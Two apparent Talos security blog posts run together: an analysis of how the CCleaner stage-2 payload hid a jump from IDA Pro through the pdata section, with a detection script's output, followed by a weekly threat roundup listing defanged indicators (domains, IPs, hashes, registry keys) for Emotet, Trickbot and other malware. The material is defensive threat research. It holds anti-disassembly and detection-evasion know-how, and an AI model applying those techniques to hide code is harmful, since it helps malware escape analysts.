In the CCleaner 64bit stage 2 previously described in our blog, we explained that the attacker modified a legitimate executable that is part of "Symantec Endpoint". This file is named EFACli64.dll. The modification is performed in the runtime code included by the compiler, more precisely in the __security_init_cookie() function. The attacker modified the last instruction to jump to the malicious code. The well-known IDA Pro disassembler has trouble displaying the modification as we will show later in this post. Finally, we will present a way to identify this kind of modification and the limitation in this approach.

IDA Pro VS Modified Runtime

During the analysis of the modified 2nd executable, we identified that IDA Pro had some difficulties when displaying correctly the assembly of the patched runtime whilst using a Graph view:


As we can see the last instruction is "pop rdi". If we switch in Text view, we can immediately see that the last instruction is in fact JMP (Jump to the malicious code):



If we checked in the open source disassembler Radare2, we can confirm that the function really finishes with a jmp instruction:



This led us to thinking: why IDA Pro does not display the last (and the most important) instruction?

As this software is not open source, we cannot simply check the code. We assume that IDA Pro use the pdata section to retrieve the beginning and the end of the runtime functions. This hypothesis is described in the next section.

The second question is: has the attacker intentionally used this trick to disrupt analysis? We cannot be 100% certain if the attacker used this trick to hide the jump in IDA Pro or whether it's simply by fluke.

Pdata Section

The pdata section is described by Microsoft here. This section contains an array of function table entries that are used for exception handling. In our context, the pdata section contains the following structure:

+0x000:        Begin Address: The RVA of the corresponding function.
+0x004:        End Address: The RVA of the end of the function.
+0x008:        Unwind Information: The RVA of the unwind information.

Here is the data concerning our function for __security_init_cookie():

+0x000:        0000F620  -> RVA of the beginning of __security_init_cookie()
+0x004:        0000F6D3  -> RVA of the end of __security_init_cookie()
+0x008:        00010464

The end address of the function (0xF6D3) is located in the middle of the jump instruction. By patching the address of the end of the function (by replacing the 0xF6D3 by 0xF6D7), IDA Pro perfectly displays the last instruction (JMP). That's why we can assume that IDA Pro really uses the pdata section to retrieve the runtime functions.

Python Script to Detect Strange Runtimes

Based on the previous explanation, we published a simple script to detect unusual runtimes based on the pdata section. The concept is to scan the runtimes based on the address provided in the pdata section and look for the last instruction. If the instruction is not an expected one (validInstructions = [ "ret", "retn", "jmp", "int3" ] in our POC) the script notifies the user that the runtime function is suspicious. Here is the output on the CCleaner 2nd stage:

user@lab:$ ./pdata_check.py sample.exe
{ 'ASM': [ u'mov qword ptr [rsp + 0x18], rbx',
u'push rdi',
u'sub rsp, 0x20',
[...redacted…]
u'mov qword ptr [rip + 0x3ac8], r11',
u'mov rbx, qword ptr [rsp + 0x40]',
u'add rsp, 0x20',
u'pop rdi'],
'StartRaw': '0xea20',
'StartVA': '0x0000f620',
'StopRaw': '0xead3',
'StopVA': '0x0000f6d3',
'end': 'KO',
'lastASM': u'pop rdi'}

The script is based on pefile and capstone. The output shows that the runtime at 0x0000f620 (RVA) finished with a "pop" instruction, which is unusual.

Limitations

This approach to detecting this particular anti-disassembly technique is not a silver bullet. We tested it on a large set of 64 bit binaries and a lot of legitimate binaries have an inconsistent pdata section. That has generated a lot a false positives. Additionally, attackers can patch the pdata section to include the additional bytes. In this case the script won't see any anomaly but IDA Pro will display correctly the additional opcodes in Graph view. This approach is an additional tool in binary analysis for malware researchers.

Conclusion

Analysis of legitimate compromised binaries is a big challenge for malware researchers. With the new trend of supply chain attacks, requests to analyze seemingly legitimate binary code will become more and more frequent. When a legitimate application is compromised, the malicious payload can be hidden in a huge amount of legitimate code. In this specific case, the analyst has an additional challenge: the output of IDA Pro cannot be fully trusted. We don't know if the trick used by the attacker is deliberate or by fluke but the result is the same: the analyst can easily miss the malicious code. We provide a script to help the analysts to identify suspicious runtime function but, as usual, it's not a silver bullet but a new tool to add to our toolkit.

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between October 6 and October 13. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this round up are:

• Doc.Trojan.Emotet-6344335-2
  Trojan
  These malicious Office documents contain embedded OLE objects, obfuscated macro code, and leverage Powershell to download payloads. These samples were particularly observed dropping the Emotet banking trojan.
   
• Doc.Dropper.Agent-6346631-0
  Office Macro Downloader
  This is an obfuscated Office Macro downloader that attempts to download a malicious payload executable.
   
• Doc.Macro.DollarShell-6346616-0
  Office Macro Downloader
  This is an obfuscated Office Macro downloader that attempts to download a malicious payload executable. It uses VBA.Shell$ to begin shell execution combined with the macro auto-open function
   
• Doc.Macro.Obfuscation-6344051-0
  Office Macro
  These Office document samples make use of various obfuscation techniques to evade detection. This cluster focuses on unused junk code added to a macro to prevent quick analysis.
   
• Doc.Macro.VBSDownloader-6346528-1
  Office Macro Downloader
  Word documents with macros encoded with base64 have been prevalent in the last few days. Recent samples try to evade detection by fragmenting the word "powershell" and inserting characters in between.
   
• Win.Downloader.Trickbot-6344490-1
  Downloader
  Trickbot is a banking trojan targeting sensitive information for select financial institutions. These recent downloaders are spread via spam as secure documents with the sender spoofed as several different banks.
   
• Win.Trojan.RevengeRat-6344273-0
  Trojan
  This Remote Access Tool (RAT) allows the operator to perform any action on the infected system, such as spying on the user, exfiltrating data, or running additional malicious software.
   
• Win.Trojan.Tofsee-6345150-0
  Trojan
  This malware provides an entry point for other bundled malware. We have seen these samples connect to the Zeus botnet, exhibit behavior of ransomware, and send spam. The bundled content is wrapped in several layers of encryption.
   
• Win.Trojan.Vilsel-4621
  Trojan
  Vilsel is old but prolific malware written in Visual Basic. It copies itself to several locations on the victim's computer, concatenating random bytes to the end of each of its copies. It gains persistence by copying itself to the victim's Startup folder.
   

---

Threats

Doc.Trojan.Emotet-6344335-2

Indicators of Compromise

Registry Keys

• <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
• Value: ProxyServer
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: ProxyBypass
• <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
• Value: ProxyOverride

Mutexes

• \BaseNamedObjects\Global\I9B0091C
• Global\I98B68E3C
• Global\M98B68E3C
• \BaseNamedObjects\M3AD7726C
• MC1D37BE7

IP Addresses

• N/A

Domain Names

• dmsdjing[.]com
• giantsinthesky[.]com
• ihugny[.]com
• haylophoto[.]com
• joshzak[.]com

Files and or directories created

• \Users\Administrator\Documents\20170925\PowerShell_transcript.PC.FsvUAdg8.20170925212636.txt
• \Users\Administrator\Documents\20171010\PowerShell_transcript.PC.ywSjiQPH.20171010164255.txt

File Hashes

• e995a259e0046d0f53b9b2715550d8eee9ffada5bf8a14faaaf6a77a7ce2fbcf
• 56aa0e876398efcb1ba2e8465e8bd91109e700147eff81acac5ad2514e2f011a
• a54134f7e0303f27781cdb6152e87ac0be5a6e736e242f9f5bcaca0e79dfca89
• 5b060682f0a97793797856af8c37265825d2c6769d9e69bc14833a98672e004a
• a38563a27a75eab4ddc5d76a99a1e8589775add35fce1e20d0b2bc6b64bf2cfb
• f7972ab6d27883f9c1a0fb6b0e54466eb6305eaa1bfb6c09da82e1539bbe7fc4
• d91e08ac9c92e97acc03c87aeb20383150f17a26946e74eb450f48ddf612d5dc
• 4a5d8769935f5126bca4ccfd5f0c658fb6e7d41a34475d9b7712d51b3884e2f3
• 4beabf7a352c6dc30a2273392f4daa5793e43412c3eba3724e2ed9e5631c41c2
• 0c34b872ba2266c2028e27c9fc9bed8fe9c6f04221695e19c5194200a9638d6e
• 24b041585da64a03245c460805f68dbac94b63d19aba6f1bbf7f7d6fa3a26033
• ee69976d53e2f0ee0d502f416ac54cb795059005f82989e095bdc7e5e299acbe
• 73ca04dd07cefa6bc4fc68714e0f2ec98f251833ff48eb8276f8cea09526fa89
• 3204f0c0ea5cafad98a2884d6c44a6eb7d4de82978962bbe2dbe332919b1185f
• 4ce5366c7eef1fff1260d5d7a0aec72c1246621838bf8df07f4a6ab3e5369d96
• ef38926f1932b370abe835b38c51b806d4282e420ee06b312d9a2a25c446cf44
• e77ff24ea71560ffcb9b6e63e9920787d858865ba09f5d63a7e44cb86a569a6e
• b160f7e0036a12a9b7b499249950aaeec569484ff0d50122c4d32d72c75aaf49

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Doc.Dropper.Agent-6346631-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• Local\ZonesLockedCacheCounterMutex
• Local\WinSpl64To32Mutex_e39d_0_3000
• Local\MSCTF.Asm.MutexDefault1
• Local\ZonesCacheCounterMutex
• Global\552FFA80-3393-423d-8671-7BA046BB5906

IP Addresses

• N/A

Domain Names

• N/A

Files and or directories created

• \Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C5F7053F-0132-4AED-9DD3-3BD5F82E6BF2}.tmp
• \TEMP\~$f56d32aea142f2f1bd162f709949a06025a400defd6a8fa564be8fdd02d81d.doc
• \Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4312D399-C51E-4E15-8491-42FD34DED614}.tmp
• \Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0000.doc
• \TEMP\6ff56d32aea142f2f1bd162f709949a06025a400defd6a8fa564be8fdd02d81d.doc
• %AppData%\Microsoft\Office\Recent\6ff56d32aea142f2f1bd162f709949a06025a400defd6a8fa564be8fdd02d81d.LNK
• %TEMP%\CVR700.tmp.cvr

File Hashes

• 6ff56d32aea142f2f1bd162f709949a06025a400defd6a8fa564be8fdd02d81d
• 71f2070d889c5d68b49bf31c45681cef343fbcf591b5f78e33471bc561541555
• 9246db170b7877dd00c0ea6154e28c33d0fc4c474efa934012657baf4f2b305a
• 2534cdf72fdb3f4e7580f2afc0eab07abb547aea1e3ac8dd36d34303d4370d73
• 64ffe80a9df394598ce7f1129242510c3fdeadadd374721e954910a5f0cd88ad
• 96894cb20067c2dad1d342f918b3c8aa4bb3941571c237ba1d830f584d9a116b
• bad6335692e4deeea9050fe22a88dda2723b053bf165c076d67262d9d40064c2
• d8cc4e04f80fa3073d7522f28d0c4a94ba7c2867e27b37175b02e11103ceb1d1
• 4ccf25007d397304643830d11f5f39bd9bdd73469b71caf4696cc4f466c98183
• 3cb3476f8998fdd58ba76d636cf18040ca3503c9e713da2ef1a65e15e39c9b69
• ab88aa6377b9721c3091183632db23b817d99a3f3c5aafc4d5d549ef59d55040
• e0a31ea6e31090ac6826033b96ea3bbe27b925b228e4f94c232beb5dfc289577
• b47f65ff1975b3eb15e0b41872221d655d99e13f952d32b334168b8c3a684ea5

Coverage

Screenshots of Detection

AMP

ThreatGrid

Screenshot

---

Doc.Macro.DollarShell-6346616-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• N/A

IP Addresses

• 185[.]35[.]228[.]6
• 52[.]179[.]17[.]38
• 192[.]168[.]1[.]219
• 167[.]114[.]121[.]80

Domain Names

• halalsecurities[.]com

Files and or directories created

• %WinDir%\SysWOW64\specsystem.exe

File Hashes

• 5c3fff626f931fff80d79e53fdbf41a591f8dc048df2c7b636aa2d7a388d8e63
• 26582ff0d7d9578d564bedc4f3add7d0d2326be6959039b7dc2372458390e810
• 2c34d5de4bfbca74b4a782a221c44311fba086f876af6020f16c36b8759dcd24
• bb1a67049f2f65ce40d68a111becaf0f772754c024013b8d8a869d59472af9eb
• 25948723a1ed54e5d7994639b0002f5074ff60b0bbd61a78c1e59dd80ebb4c54

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Screenshot

---

Doc.Macro.Obfuscation-6344051-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• N/A

IP Addresses

• 52[.]179[.]17[.]38

Domain Names

• N/A

Files and or directories created

• N/A

File Hashes

• 25210b1abea142ae5d2fa21e2a2ea836f1eb3a62cc7118f2188bf63904c9523a
• 1da8eda0545dbe5a53d41fb1b9ed71c7129cf14b2395acffd601056b7d6765fd
• 1e85b7f0d09e6a43cd83a66c287c1d34125ab9ee8e2f81d86a6c46ef44e37c20
• a7b7a582248f4ed47c8816c9436e7a49f2c02a83d18014509d0215e217f19e9e
• 6f7b63d2f5be6d7ada5c8146e076af21acd4273d538d46c1dddf6bed222a6d4d
• 4abacdd4177a4446dedc00992c7d33538fd0046ba99971c2dcbdff49d51a7664
• 81bcde515e51332cd4b92996655fb28448c2b3a83b6a63443ee680ad63acdce1
• c1a87f71d9f51cbbc82c03b58b75bdd6feb7d1be1d9d292c4a6a107b78a64efc
• 9e316bc8edd80e260d8ef24accfd2f1c1561665171d0721f4a36585e9b1cbe99
• 7ba4b97d8ef2eb865b6d6e76c77446657eb39269b5d276e77f458fa3fd639e2c
• 0b2799af3a38a865c37fe534c3f2f67d085757b09f5e489025037a1ed90f9b98
• fd5c9b1ea6c9c76f3282634f8d7b02e0dba6e9813ae0143c7073ecdd925ee2f8
• e0d0d55c04eb477c6becda415eed279895c56e4468df63ae302be7d389c95741
• 85fe7541480ab4165d31d0d83a020068a3de0f673e50b3aefa4be22f51f47704
• 7cdeb17d6bfa95e937868b7761be87ded361ec49cf6be88286a1c2cb22f3976a
• ee787d5959e57fe1787b36a3bfa3fd4d90e4a0b1705f96f4a90a06d0bdd75cab
• 984730d87bc7df01d890f8719f83712c7eaf7af05de5cb9a49d3132dc6251751
• a60e1a67b0080b342a5586a53497f2ea2ac51c55cf5b2b721593ddfc1248c838
• 0ff727f106fecde4e4292f0e35092376786cf8a9097da064623ffa912db7e9bf
• b2c8a5be4249b5eb4b4a28cffaa3ef247589e0eb5ce0b7a914f8c1704b7f6cb4
• 6adbd32b36470178e4cbc4bf7c757e4338457cac8c53fc5f8a86b3bcfec2fa6d
• b49adc35b4a6add49bc0accfc9ce9b6d2f8c093af0c2ee6dd05750aba2c75503
• 9de97b64e55209d946f21d8e1be015932f0df9df1acc0c282b8aaf6885b5d254
• 485ac8f15a1ed8005940365da1dd1031244eb9b18b86cc97a001483d23983e01

Coverage

Screenshots of Detection

AMP

ThreatGrid

---

Doc.Macro.VBSDownloader-6346528-1

Indicators of Compromise

Registry Keys

• <HKLM>\SYSTEM\CONTROLSET001\CONTROL\NETWORK\{4D36E972-E325-11CE-BFC1-08002BE10318}\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}\CONNECTION
• Value: PnpInstanceID
• <HKLM>\SYSTEM\CONTROLSET001\ENUM\SW\{EEAB7790-C514-11D1-B42B-00805FC1270E}\ASYNCMAC
• Value: CustomPropertyHwIdKey
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: AutoDetect
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: IntranetName
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: IntranetName
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: ProxyBypass
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: ProxyBypass
• <HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\52125234
• Value: 52125234
• <HKCU>\Printers\DevModePerUser
• <HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\

Mutexes

• Local\WinSpl64To32Mutex_44fd9_0_3000
• RasPbFile
• Local\MSCTF.Asm.MutexDefault1
• Global\552FFA80-3393-423d-8671-7BA046BB5906

IP Addresses

• 74[.]220[.]215[.]115
• 66[.]147[.]244[.]177
• 80[.]93[.]29[.]189
• 74[.]220[.]207[.]77
• 202[.]191[.]62[.]28
• 74[.]220[.]215[.]235

Domain Names

• damanidigital[.]com
• markjgriffin[.]ie
• ardentfilms[.]com
• matteostocchino[.]com
• on-int[.]com

Files and or directories created

• \Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{91051D81-AD46-4035-86B1-0308A15C9AA9}.tmp
• %TEMP%\CVR4C79.tmp.cvr
• \TEMP\~$5cb14fade7c435e10d673170dd975ee9b3f1c15fd932dc5c9d2663b4a7af10.doc
• \Users\Administrator\Documents\20171013\PowerShell_transcript.PC._mX5ReZQ.20171013054549.txt
• %AppData%\Microsoft\Office\Recent\195cb14fade7c435e10d673170dd975ee9b3f1c15fd932dc5c9d2663b4a7af10.LNK
• \TEMP\195cb14fade7c435e10d673170dd975ee9b3f1c15fd932dc5c9d2663b4a7af10.doc

File Hashes

• 195cb14fade7c435e10d673170dd975ee9b3f1c15fd932dc5c9d2663b4a7af10
• 2374d35b524259f14a3cd41eca49417c69fafdab226a4d00788c014b3c2c922c
• 25948723a1ed54e5d7994639b0002f5074ff60b0bbd61a78c1e59dd80ebb4c54
• 26582ff0d7d9578d564bedc4f3add7d0d2326be6959039b7dc2372458390e810
• 2747932c56b816aae80ace812975e868b3227ab651903c1dc01e987231cccc96
• 2c34d5de4bfbca74b4a782a221c44311fba086f876af6020f16c36b8759dcd24
• 4b9703f52464b8025e0146ae4792400f7c077194b0007b3d2ae31eb80642c517
• 4bc6d7e5960831476f33ac3d9f632ebae9c2a22aa975d20fffb0830b94bf3143
• 57794867310c0c673a34eccea666780b09287f8ca42e4c5aadd21abec43d8168
• 5c3fff626f931fff80d79e53fdbf41a591f8dc048df2c7b636aa2d7a388d8e63
• 9949dccece62023379790e8b563d8a93bae156be13e7698f851a3804b72fa1c3
• a6026baa4f4062b2bbf66dc3a3707f965e34271cdd3f00cae45f771e4b4b9013
• bb1a67049f2f65ce40d68a111becaf0f772754c024013b8d8a869d59472af9eb
• ca38154915f53ec6c2793e94639e2ce9701de8236e41064cba35fe7e6387af70
• db1ba6f50f367209db4733b94e8d22c8703665bf5b90716bfc754b3639d4c76a
• e95c8bf136de1cd79bfd3811072e7d02441aa5e8f57ab60e2b1478a4d4ca5678

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Screenshot

---

Win.Downloader.Trickbot-6344490-1

Indicators of Compromise

Registry Keys

• <HKU>\Software\Microsoft\Windows\ShellNoRoam\MUICache

Mutexes

• rdyboost_Perf_Library_Lock_PID_99c
• WBEMPROVIDERSTATICMUTEX
• 316D1C7871E00
• \BaseNamedObjects\647C097C25F0128
• \BaseNamedObjects\E572F578D5E00

IP Addresses

• 174[.]129[.]241[.]106
• 194[.]87[.]103[.]184
• 52[.]179[.]17[.]38
• 87[.]106[.]222[.]158
• 185[.]158[.]152[.]225
• 162[.]255[.]93[.]51
• 184[.]73[.]220[.]206
• 23[.]23[.]170[.]235

Domain Names

• diga-consult[.]de
• hill-familie[.]de
• deversdesign[.]com
• essenza[.]co[.]id

Files and or directories created

• \Users\Administrator\Documents\20171004\PowerShell_transcript.PC.9v8wz+M+.20171004215407.txt
• \Users\Administrator\Documents\20171004\PowerShell_transcript.PC.44+uZp3a.20171004215409.txt
• %AppData%\winapp\Yqtgdelssjn.exE
• %TEMP%\Gce8.bat
• %WinDir%\Tasks\services update.job
• %AppData%\winapp\Xqtfcdkssin.exE
• %System32%\config\TxR\{016888cc-6c6f-11de-8d1d-001e0bcde3ec}.TxR.blf
• %TEMP%\Ovvgpiua-_2.exE
• %AppData%\winapp\Pvvhpjua-_3.exE

File Hashes

• 0d92b1656112ed73fe98fd6c714d7959dd8ecc85759b87a6b01747a2ab0f8335
• 3ac1c23c28d19111e254649153b2cf0c03782f7523ce2062200a5ecd1c24f210
• 5351019f9879a285561e72acae1024e8a86a822f33b7bbb95c795a6bc465ff53
• 6acd175a2971b370ae7413bad180f8f745a4b391b0fa4f3e70ef660f5e3bee75
• ae860de508c56045b39679b72b570028f820d9523f7e5d6ddb326c9a757c5c77
• e6bd4d23467ee8df96837140695de5689cc7f7b73cffd9a9d40e33444766496a
• 08a5a27b430bdc6d157ebdbf5dd0e7c648d7fc0e9e3e52baf54f5b770f72e919
• 3a4ea7d6ce3bf31398f34e831249aaccc3a6c123eae239bca37ab1dd57749c19
• 8c937c4364f8c5c003f35771dd7983def26a073a9ad5dda9fca302f762dd4c83
• 793c3af7a30ca9cbb1a9f33b1986b8628af45ec1c2a04c1dd98a5cfa376f55be
• dcfcc1a702447925e8826cf1b15a79db9ceee264c46e0447f62856c52be76c9a
• 37e7afe3da64064dacbc53b5cac88972662a181aa864e094b4a45ce88318d7f3
• 721c1d648a245bc350d1ace7537db518162f725f2dab14bd4a149d8165144962
• b4492030182ee0e7c3257f417fe98d4e52d301230e31491a4563cb41fa6b3343
• 5619eeb7b8702693f78b452a0ca3df99a23b858d2b4d181bcd5588878411284e
• f45334629dc79665d85cd4748e97b876de4330094759dc4c227da19ffbbd2a34
• 27bc34902437285c3f4fe0a0e3446314baecb7ee002fcd1060b91543c27b9369
• 38748c33121e51307108ca9711c4a5109223d86565f8902268e902f83a202fbd
• a3355d8e3e5f21b84072993032341bf1edee8dd6b28a9aece5cc6ffe0e123621
• 28df3fd75d3c3748b26931a449229f585f4e4543aa25a0caf37367444bb7a7c2
• 99714908dc8d8316bcad7089c8d100755cd25f77c52bce91af0ed3a9a44db1bf

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Screenshot

---

Win.Trojan.RevengeRat-6344273-0

Indicators of Compromise

Registry Keys

• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
• Value: WindowsServices
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
• Value: internat.exe
• <HKU>\Software\Microsoft\Windows\ShellNoRoam\MUICache
• <HKU>\Software\Microsoft\Windows\CurrentVersion\Run

Mutexes

• RV_MUTEX-yHuiGGjjtnxDp
• \BaseNamedObjects\RV_MUTEX-yHuiGGjjtnxDp

IP Addresses

• 86[.]120[.]105[.]76

Domain Names

• darkcometratttt[.]ddns[.]net

Files and or directories created

• %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\WindowsServices.exe
• %SystemDrive%\Documents and Settings\Administrator\Start Menu\Programs\Startup\WindowsServices.exe

File Hashes

• 6fe71c4b59fba4e0200f2e71e308a791eadc3e6518ab87acb66db4c79df66985
• 7d0474c514e78deac6f690006546bf92c029836c60d547504ceebdd21bf6130c
• bd3bcfecf479bd347540d6305001b068583696aa81279739ee8b32eb34f2a0df
• e422cc0f5bb2d56d1def4063ac21cb8e18f97dfc48287e8b47ba07863704a8af
• e60613e2453d6568cb04ad8e09ac64b6652318079be2444156293f092cc9ff52
• b110def3771963078f3ce54d13d23a6f751ea6dc41e5177e242208791a0a8342
• fdb99a0527be797fc7d7b7f48088c21d034bce6a5c848ede43714d86d3266661
• 0d576038349acf0892cbb0124b9558bb4b80c070875017c320dd12bdc0c21f9a
• d06ffdfe71bd471b8ba5c2c9fd1191e661c6a9d2332243bc4f93f3838cbff75b

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Win.Trojan.Tofsee-6345150-0

Indicators of Compromise

Registry Keys

• <A>\{461C21F0-877D-11E7-AB94-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\A9C
• Value: AeFileID
• <HKLM>\SYSTEM\CONTROLSET001\SERVICES\QPYYZGQI
• Value: Start
• <A>\{461C21F0-877D-11E7-AB94-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\A9D
• Value: AeProgramID
• <HKLM>\SYSTEM\CONTROLSET001\SERVICES\QPYYZGQI
• Value: Description
• <A>\{461C21F0-877D-11E7-AB94-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\A9D\INDEXES\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}
• Value: 10000000095A9
• <HKLM>\SYSTEM\CONTROLSET001\SERVICES\QPYYZGQI
• Value: ObjectName
• <HKLM>\SYSTEM\CONTROLSET001\SERVICES\QPYYZGQI
• Value: ErrorControl
• <HKLM>\SYSTEM\CONTROLSET001\SERVICES\QPYYZGQI
• Value: DisplayName
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
• Value: C:\Windows\SysWOW64\qpyyzgqi
• <HKLM>\SYSTEM\CONTROLSET001\SERVICES\QPYYZGQI
• Value: WOW64
• <A>\{461C21F0-877D-11E7-AB94-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\A9C
• Value: _FileId_
• <HKLM>\SYSTEM\CONTROLSET001\SERVICES\QPYYZGQI
• Value: ImagePath
• <A>\{461C21F0-877D-11E7-AB94-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\A9D\Indexes

Mutexes

• N/A

IP Addresses

• 185[.]12[.]95[.]147
• 207[.]46[.]8[.]167
• 64[.]12[.]88[.]132
• 200[.]138[.]219[.]72
• 199[.]212[.]0[.]46
• 185[.]7[.]123[.]158
• 65[.]55[.]92[.]184
• 23[.]103[.]156[.]42
• 66[.]196[.]118[.]37
• 185[.]195[.]27[.]81
• 65[.]55[.]92[.]152
• 74[.]125[.]133[.]27
• 98[.]138[.]112[.]38
• 23[.]103[.]156[.]74
• 64[.]12[.]91[.]196
• 98[.]136[.]216[.]26
• 103[.]248[.]137[.]133
• 64[.]12[.]88[.]164
• 65[.]55[.]33[.]135
• 89[.]233[.]43[.]71
• 110[.]77[.]183[.]122
• 172[.]217[.]13[.]67
• 65[.]55[.]33[.]119
• 152[.]163[.]0[.]67
• 195[.]154[.]242[.]211
• 192[.]0[.]47[.]59
• 191[.]239[.]213[.]197
• 5[.]133[.]235[.]100
• 65[.]55[.]37[.]120
• 104[.]44[.]194[.]231
• 65[.]55[.]37[.]72
• 65[.]54[.]188[.]94
• 209[.]244[.]0[.]3
• 66[.]196[.]118[.]240

Domain Names

• mailin-01[.]mx[.]aol[.]com
• mailin-04[.]mx[.]aol[.]com
• mailin-02[.]mx[.]aol[.]com
• mx4[.]hotmail[.]com
• mta5[.]am0[.]yahoodns[.]net
• mta6[.]am0[.]yahoodns[.]net
• www[.]google[.]co[.]uk
• mx3[.]hotmail[.]com
• whois[.]arin[.]net
• mx1[.]hotmail[.]com
• comcast[.]net
• mx2[.]hotmail[.]com
• 250[.]5[.]55[.]69[.]in-addr[.]arpa
• alt4[.]gmail-smtp-in[.]l[.]google[.]com
• mta7[.]am0[.]yahoodns[.]net
• 250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org
• mx1[.]comcast[.]net
• mx1[.]charter[.]net
• 250[.]5[.]55[.]69[.]bl[.]spamcop[.]net
• alt3[.]gmail-smtp-in[.]l[.]google[.]com
• www[.]google[.]com
• microsoft-com[.]mail[.]protection[.]outlook[.]com
• microsoft[.]com
• 250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org
• mailin-03[.]mx[.]aol[.]com
• charter[.]net
• whois[.]iana[.]org
• 250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net
• gaby-gorny[.]de
• gaby-gerstner[.]com

Files and or directories created

• %WinDir%\SysWOW64\config\systemprofile\Local Settings:init
• %WinDir%\AppCompat\Programs\RecentFileCache.bcf
• %System32%\bbscpfka\pdqccygi.exe (copy)
• %WinDir%\Temp\rohwayag.exe
• %WinDir%\SysWOW64\config\systemprofile\Local Settings
• %WinDir%\SysWOW64\qpyyzgqi\eoopfgxb.exe

File Hashes

• baaf07eff95de3672affcae2e00aca57540b8bfcb1c6010ee359213d8700bd0e
• 6cbb53ee5485e756bd8680944961b6c27d59c1a610c5f93c1788a2dafd1f5706
• 0f4d468818d80d3048879c26546dc5b413956ca2a5ec5261fa54a00d03e0b393
• d02cd223f8284826a4dd1d51ecb61cc39e2588c534c0e6b848f6fbfd772fc02a
• b637127d56d4b02c131bfdeaa8a42d95210bdd33285ef5788249ba8f631a0abf
• 9f33ee45c11c52f6c6a38bb004457046f5743d51bde77282b2dc1847e9c6cbe9
• 94cab1cdda2cdf19e077add232b00de9b141f981f6def5c7309521613f6423cb
• fa1645ec20a84fd16d9d5eb2960b1caafb168f4456c7a14c8b8e5219bd15b29c
• b29d5908edaa7a98e7b7aca5614e0dbbcbaa5e15e93540f037451db52905ebdf
• 5ecce618b7b65cac1a5930608aa939241f4312a54a3efbfaf8c3bb5e27056b91

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Win.Trojan.Vilsel-4621

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• \BaseNamedObjects\Pro3

IP Addresses

• N/A

Domain Names

• N/A

Files and or directories created

• %SystemDrive%\temp.zip (copy)
• %SystemDrive%\Documents and Settings\Administrator\Start Menu\Programs\Google Chrome\backup.exe
• %SystemDrive%\c2d124b8466cec6b3e47c4\amd64\backup.exe
• %SystemDrive%\Documents and Settings\All Users\Documents\My Music\Sample Playlists\00A751EC\backup.exe
• %SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Microsoft Office\backup.exe
• %SystemDrive%\Documents and Settings\Administrator\My Documents\backup.exe
• %SystemDrive%\Documents and Settings\All Users\Favorites\backup.exe
• %SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Accessories\System Tools\update.exe
• %SystemDrive%\Documents and Settings\Administrator\Favorites\backup.exe
• %SystemDrive%\H1a02792
• %SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\backup.exe
• %SystemDrive%\Documents and Settings\Administrator\Start Menu\Programs\Startup\data.exe
• %SystemDrive%\279862715.dat

File Hashes

• eff9dcc0bebee521ebc2cb48a4398c3fe55e878fe127fda6f2ac02208e135325
